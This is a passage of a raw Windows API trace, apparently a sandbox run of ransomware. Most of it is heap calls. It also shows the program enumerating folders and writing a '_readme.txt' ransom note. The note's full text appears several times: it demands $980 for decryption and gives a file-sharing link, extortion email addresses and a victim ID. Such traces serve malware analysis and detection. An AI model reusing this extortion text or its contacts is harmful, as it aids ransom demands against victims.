(HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0180.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0180.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0180.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0180.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0180.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.171] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0180.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.172] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0180.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.172] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0180.172] PathFindFileNameW (pszPath="") returned="" [0180.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7568 [0180.172] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0180.173] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0180.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0180.173] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0180.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4ee0 [0180.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7798 [0180.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7568 | out: hHeap=0x2c0000) returned 1 [0180.173] FreeLibrary (hLibModule=0x759a0000) returned 1 [0180.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7798 | out: hHeap=0x2c0000) returned 1 [0180.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0180.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x2ac4ee0 [0180.174] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0180.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.175] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0180.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae1ea0 [0180.177] lstrcpyW (in: lpString1=0x2ae1ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0180.177] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0180.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0180.177] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0180.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1ea0 | out: hHeap=0x2c0000) returned 1 [0180.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0180.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.179] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*" (normalized: "c:\\boot\\it-it\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0180.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76a8 | out: hHeap=0x2c0000) returned 1 [0180.180] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.180] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0180.180] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0180.180] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0180.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad75e0 | out: hHeap=0x2c0000) returned 1 [0180.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad75e0 [0180.181] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0180.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76a8 [0180.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0180.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0180.181] HeapFree (in: 